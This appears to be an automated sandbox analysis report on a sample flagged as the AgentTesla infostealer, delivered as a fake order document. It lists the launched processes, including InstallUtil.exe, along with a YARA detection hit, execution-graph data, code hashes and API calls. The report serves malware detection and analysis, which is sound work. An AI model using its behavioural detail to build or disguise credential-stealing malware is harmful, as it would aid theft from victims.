                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.4607747615.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:27
                                                                          Start time:02:57:20
                                                                          Start date:27/06/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf"
                                                                          Imagebase:0x7ff651090000
                                                                          File size:5'641'176 bytes
                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:28
                                                                          Start time:02:57:30
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                          Imagebase:0x270000
                                                                          File size:42'064 bytes
                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:29
                                                                          Start time:02:57:33
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                          Imagebase:0x560000
                                                                          File size:42'064 bytes
                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:15.6%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:43
                                                                            Total number of Limit Nodes:4
                                                                            execution_graph 68779 812dc80 68781 812dcc6 DeleteFileW 68779->68781 68782 812dcff 68781->68782 68783 76e5e0 68784 76e626 GetCurrentProcess 68783->68784 68786 76e678 GetCurrentThread 68784->68786 68789 76e671 68784->68789 68787 76e6b5 GetCurrentProcess 68786->68787 68788 76e6ae 68786->68788 68790 76e6eb 68787->68790 68788->68787 68789->68786 68795 76e820 68790->68795 68800 76e7b1 68790->68800 68791 76e713 GetCurrentThreadId 68792 76e744 68791->68792 68796 76e824 68795->68796 68797 76e826 DuplicateHandle 68796->68797 68799 76e7b7 68796->68799 68798 76e8be 68797->68798 68798->68791 68799->68791 68801 76e7b4 68800->68801 68801->68791 68772 79ad9d0 68773 79adb5b 68772->68773 68775 79ad9f6 68772->68775 68775->68773 68776 79a1fdc 68775->68776 68777 79adc50 PostMessageW 68776->68777 68778 79adcbc 68777->68778 68778->68775 68802 76c258 68805 76c341 68802->68805 68803 76c267 68806 76c34a 68805->68806 68807 76c384 68805->68807 68806->68807 68813 76c5e8 68806->68813 68817 76c5d9 68806->68817 68807->68803 68808 76c37c 68808->68807 68809 76c588 GetModuleHandleW 68808->68809 68810 76c5b5 68809->68810 68810->68803 68814 76c5fc 68813->68814 68815 76c621 68814->68815 68821 76c050 68814->68821 68815->68808 68818 76c5e8 68817->68818 68819 76c050 LoadLibraryExW 68818->68819 68820 76c621 68818->68820 68819->68820 68820->68808 68822 76c7c8 LoadLibraryExW 68821->68822 68824 76c841 68822->68824 68824->68815

                                                                            Executed Functions

                                                                            Function 0814554F Relevance: 5.6, Instructions: 5646COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 23 814554f-8145796 52 814579c-81464e1 23->52 53 81477e9-8147ace 23->53 463 81464e7-81467c5 52->463 464 81467cd-81477e1 52->464 128 8147ad4-8148a7e 53->128 129 8148a86-8149afc 53->129 128->129 719 8149b02-8149e3b 129->719 720 8149e43-8149e56 129->720 463->464 464->53 719->720 725 814a503-814b3db call 814c9b0 720->725 726 8149e5c-814a4fb 720->726 1107 814b3e1-814b3e8 725->1107 726->725
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 01608331dae95fa7891e58a94d1a2f65b4695ba854795fca2740848897bdef2b
                                                                            • Instruction ID: b0deb894a2bf2b68e13c0e5fab35c8a7a158d43c816c726d6973cc2b3448c0e7
                                                                            • Opcode Fuzzy Hash: 01608331dae95fa7891e58a94d1a2f65b4695ba854795fca2740848897bdef2b
                                                                            • Instruction Fuzzy Hash: 5FC31670A06618CBCB18FF78E9996ACBBB2EF89200F4044EDD449A7354DB349E95CF51
                                                                            Function 08145568 Relevance: 5.6, Instructions: 5633COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1109 8145568-8145796 1137 814579c-81464e1 1109->1137 1138 81477e9-8147ace 1109->1138 1548 81464e7-81467c5 1137->1548 1549 81467cd-81477e1 1137->1549 1213 8147ad4-8148a7e 1138->1213 1214 8148a86-8149afc 1138->1214 1213->1214 1804 8149b02-8149e3b 1214->1804 1805 8149e43-8149e56 1214->1805 1548->1549 1549->1138 1804->1805 1810 814a503-814b3db call 814c9b0 1805->1810 1811 8149e5c-814a4fb 1805->1811 2192 814b3e1-814b3e8 1810->2192 1811->1810
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a1b1ae14a9cb8250110ea5a1ee10d1fb115da7b58eb12897f55c0b028d4a6336
                                                                            • Instruction ID: 7c53815994a21498e873f0e6b41b38e1047f5903dbacf707868528ad21f8e342
                                                                            • Opcode Fuzzy Hash: a1b1ae14a9cb8250110ea5a1ee10d1fb115da7b58eb12897f55c0b028d4a6336
                                                                            • Instruction Fuzzy Hash: FFC31670A06618CBCB18FF78E9996ACBBB2EF89200F4044EDD449A7354DB349E95CF51
                                                                            Function 0812636A Relevance: 5.2, Instructions: 5178COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2194 812636a-81265e6 3151 81265e8 call 812cb00 2194->3151 3152 81265e8 call 812caf1 2194->3152 2223 81265ee-812ba43 call 812d1a0 3150 812ba49-812ba50 2223->3150 3151->2223 3152->2223
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986151141.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8120000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 047111041a33f24deae18c162ff3ec2798afa4df654766bd9d7eaf4e408e95e9
                                                                            • Instruction ID: 8cead3f7c15da61d331bc56a7a7e6c22defdd6ecc1e4043e0683aa87efdb3cd2
                                                                            • Opcode Fuzzy Hash: 047111041a33f24deae18c162ff3ec2798afa4df654766bd9d7eaf4e408e95e9
                                                                            • Instruction Fuzzy Hash: A6B30870A056588BCB28FF78D9996ACBBB2FF88200F4485E9D449A3395DF345D94CF90
                                                                            Function 08126378 Relevance: 5.2, Instructions: 5170COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3154 8126378-81265e6 4110 81265e8 call 812cb00 3154->4110 4111 81265e8 call 812caf1 3154->4111 3182 81265ee-812ba43 call 812d1a0 4109 812ba49-812ba50 3182->4109 4110->3182 4111->3182
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986151141.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8120000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2d9717db2557084e192467fb52f01cc6f28fad7f524687ac7d4321800dde35fa
                                                                            • Instruction ID: cf38d0f70d54efe7df58a471c25a64fc82516a956a1068acfdc274f29a398e47
                                                                            • Opcode Fuzzy Hash: 2d9717db2557084e192467fb52f01cc6f28fad7f524687ac7d4321800dde35fa
                                                                            • Instruction Fuzzy Hash: C7B30870A056588BCB28FF78D9996ACBBB2FF88200F4485E9D449A3395DF345D94CF90
                                                                            Function 00765154 Relevance: 1.3, Instructions: 1264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979322070.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_760000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 89a7e0e28a1ceef76569fffb5a63a76db9a05212968a9285b2b540ad75b77a15
                                                                            • Instruction ID: 066c1fcfd0e97e4e9fb785d6b319a7581acb46182ddc368087acf8b84c0aa5bf
                                                                            • Opcode Fuzzy Hash: 89a7e0e28a1ceef76569fffb5a63a76db9a05212968a9285b2b540ad75b77a15
                                                                            • Instruction Fuzzy Hash: 26B22B70A1161ACBCB18FF78ED986ADB7B1BF88300F4085E9E849A3354DA745E84CF55
                                                                            Function 00BF80D8 Relevance: .8, Instructions: 828COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c3e81908d26fde487955851a685be8ecae8f8a20072f4d09da15c0c5f74efa6b
                                                                            • Instruction ID: 7c289bd5f57bd1ba4391090c8402fe2f64b03fcf86def0912be03d137b183b2b
                                                                            • Opcode Fuzzy Hash: c3e81908d26fde487955851a685be8ecae8f8a20072f4d09da15c0c5f74efa6b
                                                                            • Instruction Fuzzy Hash: 53626E74A002198FDB14DF69C844A6EBBF6FF88704F1485A9E605DB3A5DF309D45CB90
                                                                            Function 079A7980 Relevance: .8, Instructions: 775COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2985881190.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_79a0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 726dd82bbd7f69bd44751eb7dc5a3cd412e94c156cf967846d53d1ce5f688053
                                                                            • Instruction ID: 6888ef8dbb35d88316473e1338c51a3e93644407eaaefff4587a792c24052791
                                                                            • Opcode Fuzzy Hash: 726dd82bbd7f69bd44751eb7dc5a3cd412e94c156cf967846d53d1ce5f688053
                                                                            • Instruction Fuzzy Hash: D1420230B093858FCB09EBB8E89895DBFF2FF89200B5585AAE445E7251DF349C45CB90
                                                                            Function 08106308 Relevance: .6, Instructions: 596COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986080252.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8100000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 37dc43b74328d8d9cf6232f135db4b74efbe92021738425515a63c9fefeffeda
                                                                            • Instruction ID: 0648014670752149d4241be5dfbd369fb33ca7ca80314708593348eb6f89f910
                                                                            • Opcode Fuzzy Hash: 37dc43b74328d8d9cf6232f135db4b74efbe92021738425515a63c9fefeffeda
                                                                            • Instruction Fuzzy Hash: 20525E34A00745CFCB14DF68C844B99B7F2AF89314F2586A9D5596F3A2DBB1AD82CF40
                                                                            Function 079A794D Relevance: .6, Instructions: 570COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2985881190.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_79a0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fb4f24253cc146c1c6da2a284bb3d4b3d1ab022b1918933814ebcbbe0cfc12c0
                                                                            • Instruction ID: 9f94b6ad96d98272003e207a8f9e6f75a122d63a49ca3106684ec0938ba4bfd9
                                                                            • Opcode Fuzzy Hash: fb4f24253cc146c1c6da2a284bb3d4b3d1ab022b1918933814ebcbbe0cfc12c0
                                                                            • Instruction Fuzzy Hash: AC22AC30F016559FCB08EFB9E89999EBBF2FF88300B558569E405A7354DF349851CB90
                                                                            Function 08121BE8 Relevance: .5, Instructions: 483COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986151141.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8120000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 702efedb89d53d85d0366466f7b99f051822885cf4630d21118cf65fa1dba242
                                                                            • Instruction ID: 370cfa810fee43839ba94422e8c247ee7e3ac476b9eae7b111e841d7fba4a8c1
                                                                            • Opcode Fuzzy Hash: 702efedb89d53d85d0366466f7b99f051822885cf4630d21118cf65fa1dba242
                                                                            • Instruction Fuzzy Hash: 06028930700215DFDB18EB78C854B6E7BE2AF89711F158569E44ADB3A1CF34AC46CBA0
                                                                            Function 00BF8B18 Relevance: .4, Instructions: 383COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d8b8b663c7e85b4b22ef7515cd917d0bc7550d11c073bd8080bcc1ab7722e1bb
                                                                            • Instruction ID: 5ad6fe0b7f9b60e0d2bb741601819a0ed9a53dbfc882062992ce3db3e738f4f9
                                                                            • Opcode Fuzzy Hash: d8b8b663c7e85b4b22ef7515cd917d0bc7550d11c073bd8080bcc1ab7722e1bb
                                                                            • Instruction Fuzzy Hash: 03F13C74A10119DFDB14CF69C884AADBBF2FF88350F1584A9E645EB2A1DB30EC45CB50
                                                                            Function 00BFC7F8 Relevance: .4, Instructions: 356COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5400dab5746e444dfab1d7d6a17ee4afdb7d8df8f584d57c3bcb5309beacf2fb
                                                                            • Instruction ID: 95d61bc1f375630ea85a494c7f3a2554b67ce9ff22298ef288899a6e904ee659
                                                                            • Opcode Fuzzy Hash: 5400dab5746e444dfab1d7d6a17ee4afdb7d8df8f584d57c3bcb5309beacf2fb
                                                                            • Instruction Fuzzy Hash: CB029174E0025CCFEB64DFA9C944BADBBF2BF89300F1481A9D509AB265DB705E858F50
                                                                            Function 00BFBA80 Relevance: .3, Instructions: 333COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d087d49c1ed53d765733ad613d786b78777578292058f2bbe853a3d3113c2c88
                                                                            • Instruction ID: 917a73c7333a0e26de638f47eb19c3f3659de7c3a24efbed7d88517c3bd74b1b
                                                                            • Opcode Fuzzy Hash: d087d49c1ed53d765733ad613d786b78777578292058f2bbe853a3d3113c2c88
                                                                            • Instruction Fuzzy Hash: 38B18438704219CBDB281A35C858B7ABAEAEFC0741F288DADD652D7198CF34CC4D9756
                                                                            Function 0076E5E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0076E65E
                                                                            • GetCurrentThread.KERNEL32 ref: 0076E69B
                                                                            • GetCurrentProcess.KERNEL32 ref: 0076E6D8
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0076E731
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979322070.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_760000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 2962be13afee93b1cacbdbb22bf9ca1e729ec5793916e9a6ef19104f0badc729
                                                                            • Instruction ID: 4ee105d4f05f7481d84dbba6ec2cdc234766b02632566d4e3768f7d5156788cd
                                                                            • Opcode Fuzzy Hash: 2962be13afee93b1cacbdbb22bf9ca1e729ec5793916e9a6ef19104f0badc729
                                                                            • Instruction Fuzzy Hash: FC5157B4900349CFDB14CFA9DA48B9EBBF1EF88314F24C069E409A7260DB785944CF65
                                                                            Function 0076C341 Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 5359 76c341-76c348 5360 76c386-76c388 5359->5360 5361 76c34a-76c35f 5359->5361 5363 76c38b-76c38f 5360->5363 5361->5363 5366 76c361-76c36e call 769ab4 5361->5366 5364 76c3a3-76c3e4 5363->5364 5365 76c391-76c39b 5363->5365 5371 76c3e6-76c3ee 5364->5371 5372 76c3f1-76c3ff 5364->5372 5365->5364 5373 76c384 5366->5373 5374 76c370 5366->5374 5371->5372 5375 76c423-76c425 5372->5375 5376 76c401-76c406 5372->5376 5373->5360 5421 76c376 call 76c5e8 5374->5421 5422 76c376 call 76c5d9 5374->5422 5377 76c428-76c42f 5375->5377 5378 76c411 5376->5378 5379 76c408-76c40f call 76adc0 5376->5379 5381 76c431-76c439 5377->5381 5382 76c43c-76c443 5377->5382 5385 76c413-76c421 5378->5385 5379->5385 5380 76c37c-76c37e 5380->5373 5384 76c4c0-76c538 5380->5384 5381->5382 5386 76c445-76c44d 5382->5386 5387 76c450-76c459 call 76c014 5382->5387 5412 76c577-76c580 5384->5412 5413 76c53a-76c576 5384->5413 5385->5377 5386->5387 5392 76c466-76c46b 5387->5392 5393 76c45b-76c463 5387->5393 5395 76c46d-76c474 5392->5395 5396 76c489-76c490 call 76c8e8 5392->5396 5393->5392 5395->5396 5397 76c476-76c486 call 76c024 call 76c034 5395->5397 5399 76c493-76c496 5396->5399 5397->5396 5401 76c498-76c4b6 5399->5401 5402 76c4b9-76c4bf 5399->5402 5401->5402 5415 76c582-76c585 5412->5415 5416 76c588-76c5b3 GetModuleHandleW 5412->5416 5413->5412 5415->5416 5417 76c5b5-76c5bb 5416->5417 5418 76c5bc-76c5d0 5416->5418 5417->5418 5421->5380 5422->5380
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0076C5A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979322070.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_760000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: c62194427af614541d98f13dd2fc1ded09ef64c01a99569adac2aee716d87b27
                                                                            • Instruction ID: cff6a1bbca8a7ff67e53550929286c1c9b916ea3d6550bc67cc6a13164ee95c0
                                                                            • Opcode Fuzzy Hash: c62194427af614541d98f13dd2fc1ded09ef64c01a99569adac2aee716d87b27
                                                                            • Instruction Fuzzy Hash: 7D819570A00B458FDB25DF6AD45476ABBF1FF88304F10892ED88AD7A51DB78E805CB90
                                                                            Function 0076E820 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 5859 76e820-76e824 5861 76e826-76e8bc DuplicateHandle 5859->5861 5862 76e7b7-76e7e7 5859->5862 5865 76e8c5-76e8e2 5861->5865 5866 76e8be-76e8c4 5861->5866 5863 76e7ee-76e814 5862->5863 5864 76e7e9 call 76e3a8 5862->5864 5864->5863 5866->5865
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0076E8AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979322070.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_760000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 4505f7e9319080f180d272244e777464c1e9227ebc97c7207eea6c6f19f761c9
                                                                            • Instruction ID: a290c4c791c5ff5220ce909de27886046ca85d9b594752f74dab057adcbd940c
                                                                            • Opcode Fuzzy Hash: 4505f7e9319080f180d272244e777464c1e9227ebc97c7207eea6c6f19f761c9
                                                                            • Instruction Fuzzy Hash: 10414A7A9002499FCF11CF99D944ADEBFF9EF88310F14805AE945A7361C7359954CFA0
                                                                            Function 0076E828 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 5871 76e828-76e8bc DuplicateHandle 5872 76e8c5-76e8e2 5871->5872 5873 76e8be-76e8c4 5871->5873 5873->5872
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0076E8AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979322070.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_760000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: dd6b4f031f3e621111260d7ea5312159b6146a03e93526eadb190e13de871451
                                                                            • Instruction ID: b2257604f07b16e0bf3d396a5e0fd521f02ba7a3b598529436abc6b3a2818b11
                                                                            • Opcode Fuzzy Hash: dd6b4f031f3e621111260d7ea5312159b6146a03e93526eadb190e13de871451
                                                                            • Instruction Fuzzy Hash: 6921E3B5900349DFDB10CF9AD984ADEBBF8FB48320F14801AE915A3350D378A954CFA0
                                                                            Function 0812DC80 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 0812DCF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986151141.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8120000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: 474425368159083431b37a1ecfb0581149a2b8f919882ccfa34d70efd76e723f
                                                                            • Instruction ID: 71469b9ec89d12fd216d5fae6cf5cd081f4f2c98bc15699b9d813edef1a36013
                                                                            • Opcode Fuzzy Hash: 474425368159083431b37a1ecfb0581149a2b8f919882ccfa34d70efd76e723f
                                                                            • Instruction Fuzzy Hash: 061136B1C0066ADFCB14CF9AD54479EFBB4BF48720F10812AD818B7240D778A954CFA1
                                                                            Function 0076C050 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0076C621,00000800,00000000,00000000), ref: 0076C832
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979322070.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_760000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 6098eca1d4f6658cc616925d399bb266741075b0ea4962c91768fc9c2dbca8d1
                                                                            • Instruction ID: 9f592077cd25a5c80d62e9404b4da572f01170d81c208b3f8ecc6c43a8a0db39
                                                                            • Opcode Fuzzy Hash: 6098eca1d4f6658cc616925d399bb266741075b0ea4962c91768fc9c2dbca8d1
                                                                            • Instruction Fuzzy Hash: 1111EAB6D043499FDB10CF9AC444AAEFBF4EB48710F10842AD955A7200C779A545CFA5
                                                                            Function 0076C7C0 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0076C621,00000800,00000000,00000000), ref: 0076C832
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979322070.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_760000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: cb6d117139bd1dceccc9ffa23f98faf42c0f2bee046b5d92a9d4196b073524e4
                                                                            • Instruction ID: 3a5107f8e92494e0ac28f58d0e2d96d0814af9274614f0a148a648c60895b887
                                                                            • Opcode Fuzzy Hash: cb6d117139bd1dceccc9ffa23f98faf42c0f2bee046b5d92a9d4196b073524e4
                                                                            • Instruction Fuzzy Hash: 6E11E4B6D002498FDB11CF9AC944A9EFBF4AB88310F14842EE959A7610C379A545CFA4
                                                                            Function 079A1FDC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 079ADCAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2985881190.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_79a0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
